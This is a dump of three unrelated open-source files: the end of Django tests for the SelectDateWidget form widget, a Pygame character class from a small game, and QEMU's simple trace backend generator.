<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31" selected="selected">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering with a custom months dict.
w = SelectDateWidget(months=MONTHS_AP, years=('2013',))
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">Jan.</option>
<option value="2">Feb.</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">Aug.</option>
<option value="9">Sept.</option>
<option value="10">Oct.</option>
<option value="11">Nov.</option>
<option value="12">Dec.</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2013">2013</option>
</select>
""",
)
a = GetDate({'mydate_month': '4', 'mydate_day': '1', 'mydate_year': '2008'})
self.assertTrue(a.is_valid())
self.assertEqual(a.cleaned_data['mydate'], datetime.date(2008, 4, 1))
# As with any widget that implements get_value_from_datadict,
# we must be prepared to accept the input from the "as_hidden"
# rendering as well.
self.assertHTMLEqual(
a['mydate'].as_hidden(),
'<input type="hidden" name="mydate" value="2008-4-1" id="id_mydate" />',
)
b = GetDate({'mydate': '2008-4-1'})
self.assertTrue(b.is_valid())
self.assertEqual(b.cleaned_data['mydate'], datetime.date(2008, 4, 1))
# Invalid dates shouldn't be allowed
c = GetDate({'mydate_month': '2', 'mydate_day': '31', 'mydate_year': '2010'})
self.assertFalse(c.is_valid())
self.assertEqual(c.errors, {'mydate': ['Enter a valid date.']})
# label tag is correctly associated with month dropdown
d = GetDate({'mydate_month': '1', 'mydate_day': '1', 'mydate_year': '2010'})
self.assertIn('<label for="id_mydate_month">', d.as_p())
def test_selectdate_required(self):
class GetNotRequiredDate(Form):
mydate = DateField(widget=SelectDateWidget, required=False)
class GetRequiredDate(Form):
mydate = DateField(widget=SelectDateWidget, required=True)
self.assertFalse(GetNotRequiredDate().fields['mydate'].widget.is_required)
self.assertTrue(GetRequiredDate().fields['mydate'].widget.is_required)
def test_selectdate_empty_label(self):
w = SelectDateWidget(years=('2014',), empty_label='empty_label')
# Rendering the default state with empty_label setted as string.
self.assertInHTML('<option value="0">empty_label</option>', w.render('mydate', ''), count=3)
w = SelectDateWidget(years=('2014',), empty_label=('empty_year', 'empty_month', 'empty_day'))
# Rendering the default state with empty_label tuple.
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">empty_month</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">empty_day</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">empty_year</option>
<option value="2014">2014</option>
</select>
""",
)
self.assertRaisesMessage(ValueError, 'empty_label list/tuple must have 3 elements.',
SelectDateWidget, years=('2014',), empty_label=('not enough', 'values'))
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n(self):
w = SelectDateWidget(years=('2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016'))
self.assertEqual(
w.value_from_datadict({'date_year': '2010', 'date_month': '8', 'date_day': '13'}, {}, 'date'),
'13-08-2010',
)
self.assertHTMLEqual(
w.render('date', '13-08-2010'),
"""
<select name="date_day" id="id_date_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13" selected="selected">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="date_month" id="id_date_month">
<option value="0">---</option>
<option value="1">januari</option>
<option value="2">februari</option>
<option value="3">maart</option>
<option value="4">april</option>
<option value="5">mei</option>
<option value="6">juni</option>
<option value="7">juli</option>
<option value="8" selected="selected">augustus</option>
<option value="9">september</option>
<option value="10">oktober</option>
<option value="11">november</option>
<option value="12">december</option>
</select>
<select name="date_year" id="id_date_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Even with an invalid date, the widget should reflect the entered value (#17401).
self.assertEqual(w.render('mydate', '2010-02-30').count('selected="selected"'), 3)
# Years before 1900 work
w = SelectDateWidget(years=('1899',))
self.assertEqual(
w.value_from_datadict({'date_year': '1899', 'date_month': '8', 'date_day': '13'}, {}, 'date'),
'13-08-1899',
)
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n_date_changed(self):
"""
Ensure that DateField.has_changed() with SelectDateWidget works
correctly with a localized date format.
Refs #17165.
"""
# With Field.show_hidden_initial=False -----------------------
b = GetDate({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '1',
}, initial={'mydate': datetime.date(2008, 4, 1)})
self.assertFalse(b.has_changed())
b = GetDate({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '2',
}, initial={'mydate': datetime.date(2008, 4, 1)})
self.assertTrue(b.has_changed())
# With Field.show_hidden_initial=True ------------------------
class GetDateShowHiddenInitial(Form):
mydate = DateField(widget=SelectDateWidget, show_hidden_initial=True)
b = GetDateShowHiddenInitial({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '1',
'initial-mydate': HiddenInput()._format_value(datetime.date(2008, 4, 1))
}, initial={'mydate': datetime.date(2008, 4, 1)})
self.assertFalse(b.has_changed())
b = GetDateShowHiddenInitial({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '22',
'initial-mydate': HiddenInput()._format_value(datetime.date(2008, 4, 1))
}, initial={'mydate': datetime.date(2008, 4, 1)})
self.assertTrue(b.has_changed())
b = GetDateShowHiddenInitial({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '22',
'initial-mydate': HiddenInput()._format_value(datetime.date(2008, 4, 1))
}, initial={'mydate': datetime.date(2008, 4, 22)})
self.assertTrue(b.has_changed())
b = GetDateShowHiddenInitial({
'mydate_year': '2008',
'mydate_month': '4',
'mydate_day': '22',
'initial-mydate': HiddenInput()._format_value(datetime.date(2008, 4, 22))
}, initial={'mydate': datetime.date(2008, 4, 1)})
self.assertFalse(b.has_changed())
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n_invalid_date_in(self):
# Invalid dates shouldn't be allowed
a = GetDate({'mydate_month': '2', 'mydate_day': '31', 'mydate_year': '2010'})
self.assertFalse(a.is_valid())
# 'Geef een geldige datum op.' = 'Enter a valid date.'
self.assertEqual(a.errors, {'mydate': ['Geef een geldige datum op.']})
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_form_label_association(self):
# label tag is correctly associated with first rendered dropdown
a = GetDate({'mydate_month': '1', 'mydate_day': '1', 'mydate_year': '2010'})
self.assertIn('<label for="id_mydate_day">', a.as_p())
| bsd-3-clause |
geekandtechgirls/The-Last-Caturai | Character.py | 1 | 2753 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""character.py"""
"""
This file is part of The Last Caturai.
The Last Caturai is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The Last Caturai is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Foobar. If not, see <http://www.gnu.org/licenses/>.
"""
"""Defines an abstract character"""
from Physics import Physics
# import constants # => neccesary for jump method
# import pygame
class Character(Physics):
def __init__(self, hp, position, sprite):
super(Character, self).__init__(img_path=sprite, position = position)
self.hp = hp
self.rect = self.image.get_rect()
# self.abajo, self.arriba, self.dcha, self.izq = self._cortar_chara(fil=3)
self.movimientos = self._cortar_chara(fil=2)
# Corta un chara en las fil y col indicadas.
def _cortar_chara(self, fil):
# La idea de esta función es devolver una tupla con cuatro vectores:
# * sprites de movimiento hacia la izquierda
# * sprites de movimiento hacia la derecha
# * sprites de movimiento hacia arriba
# * sprites de movimiento hacia abajo
abajo = [0]*fil
arriba = [0]*fil
dcha = [0]*fil
izq = [0]*fil
for i in range(fil):
abajo[i] = (i*35, 0, 32, 32)
izq[i] = (i*35, 35, 32, 32)
dcha[i] = (i*35, 75, 32, 32)
arriba[i] = (i*35, 105, 32, 32)
return ({'A':abajo, 'U':arriba, 'D':dcha, 'I':izq})
def draw(self, screen):
screen.blit(self.image, self.position, self.movimientos[self.direction][self.index])
def attack(self):
raise NotImplemented("Implement the atack in MainCharacter and Enemy")
def movement(self):
raise NotImplemented("Implement the atack in MainCharacter and Enemy")
def jump(self):
self.change_y_speed_vector(-20)
self.on_ground=False
# self.rect.y += 2
# platform_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)
# self.rect.y -= 2
# # If it is ok to jump, set our speed upwards
#
# if len(platform_hit_list) > 0 or self.rect.bottom >= constants.SCREEN_HEIGHT:
# self.__position_y__ = -10 | gpl-3.0 |
tayrn/qemu | scripts/tracetool/backend/simple.py | 55 | 1385 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple built-in backend.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
from tracetool import out
def c(events):
out('#include "trace.h"',
'',
'TraceEvent trace_list[] = {')
for e in events:
out('{.tp_name = "%(name)s", .state=0},',
name = e.name,
)
out('};')
def h(events):
out('#include "trace/simple.h"',
'')
for num, e in enumerate(events):
if len(e.args):
argstr = e.args.names()
arg_prefix = ', (uint64_t)(uintptr_t)'
cast_args = arg_prefix + arg_prefix.join(argstr)
simple_args = (str(num) + cast_args)
else:
simple_args = str(num)
out('static inline void trace_%(name)s(%(args)s)',
'{',
' trace%(argc)d(%(trace_args)s);',
'}',
name = e.name,
args = e.args,
argc = len(e.args),
trace_args = simple_args,
)
out('#define NR_TRACE_EVENTS %d' % len(events))
out('extern TraceEvent trace_list[NR_TRACE_EVENTS];')
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.